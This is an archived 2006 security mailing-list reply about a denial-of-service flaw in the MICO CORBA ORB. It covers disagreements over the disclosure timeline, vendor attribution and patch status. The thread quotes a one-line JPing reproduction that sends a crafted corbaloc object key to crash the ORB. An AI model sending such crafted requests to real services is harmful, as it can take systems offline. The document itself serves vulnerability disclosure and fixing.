lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <Pine.LNX.4.63.0607101921400.3835@silence.gardas.net>
Date: Mon Jul 10 21:11:11 2006
From: kgardas at objectsecurity.com (Karel Gardas)
Subject: Re: Mico crashes when contected with wrong IOR /
	DoS


Hi Christoph,

I'm not angry at all and I hope you are neither. Thank you for taking time 
and provide us with nice way how to duplicate the issue. Also to give us 
time to fix it before full disclosure which has not been used due to 
communication/organization issues. Anyway, points taken, we (MICO 
community) should provide single email address for all vulnerability 
reports. I've added JacORB notes in my original reply since I've thought 
you were also testing the issue with JacORB, perhaps I've read this in 
some of your files.

Thanks,
Karel

On Mon, 10 Jul 2006, tuergeist wrote:

> Hi,
>
> I would just give my 2ct
>
>> I would just like to add some corrections to disclosure below.
>> 
>
>> > == 1. Affected Vendor ==
>> >   Object Security
>> 
>> This information is incorrect. ObjectSecurity is not the vendor of the
>> MICO ORB. MICO is a free software project licensed under LGPL/GPL
>> licenses. ObjectSecurity is its long time user and contributor besides
>> lots of other companies and supporters.
> Ok. Commercially supported by the CORBA specialists: Object Security.
> However, look @ point 2 "Open Source ORB". I think it was clear.
>
>> > == 3. Vulnerability ==
>> >   MICO crashes when contacted with wrong object key (part: orb-id or
>> >   orb-creation time)
>> 
>> Side note: object ID is opaque value, so we do not distinguish any part of
>> it as orb-id or orb-creation time. Perhaps you get this knowledge from
>> other ORB, but this is strickly ORB dependent.
> Yes. I know, object ID is opaque value. But I took a look into the
> sources - I was only to give extra information.
>
>> > == 4. Safety Hazard ==
>> >   critical, potential Denial-of-Service
>> >
>> > == 5. Disclosure Timeline ==
>> >   2006-06-27 Problem found and analysed / tested with other versions
>> >   2006-06-29 Vulnerability reported to vendor and MICOs
>> >                devel-mailing-list
>> 
>> Unfortunately your email has not come to mico-devel@...o.org mailing list
>> yet. Also if you would like to contact directly ObjectSecurity with some
>> security issue, please consider using security@...ectsecurity.com email
>> address next time.
>> 
> At 29.06.2006 12:43 CEST I wrote you AND mico-devel, but my "message
> to Mico-devel awaits moderator approval" - This is definitely NOT my
> problem.
>
>> > == 7. Patch / Workaround ==
>> >   No Patch avaible yet.
>> 
>> Patch is already available and the main MICO download page contains a link
>> to it: http://mico.org/down.html
> Was not at time of full-disclosure. I updated this, when update was avaible.
>
>> >       $ java JPing -p corbaloc:: 192.168.1.10:8010//200/1151845678/0/_5
>> >     orb.string_to_object             ... ok
>> >     object exists? Exception caught; org.omg.CORBA.COMM_FAILURE:
>> >     vmcid: SUN  minor code: 208 completed: Maybe
>> 
>> Side note: if you test fixed MICO together with your ping utility
>> running on top of JacORB, you will get COMM_FAILURE exception
>> too. That's because of a bug in JacORB [...]
> As you can see, I am not using JacORB, I am not related to JacORB or
> sth. else. In this example I used the SUN JDK ORB. Read, think,
> answer. I wrote "It's also possible to use JacORBs pingo.." "also" in
> this case doesn't mean "exactly"
>
> The point wasn't what my client said - the point was, that mico crashed!!!
>
> regarding JacORB: report it to the JacORB community, not to me.
>
> Regards,
> Christoph
>
> p.s. The other way is not to contact you or full disclosure but
> selling the information. So, don't look back in anger.
>

--
Karel Gardas                  kgardas@...ectsecurity.com
ObjectSecurity Ltd.           http://www.objectsecurity.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ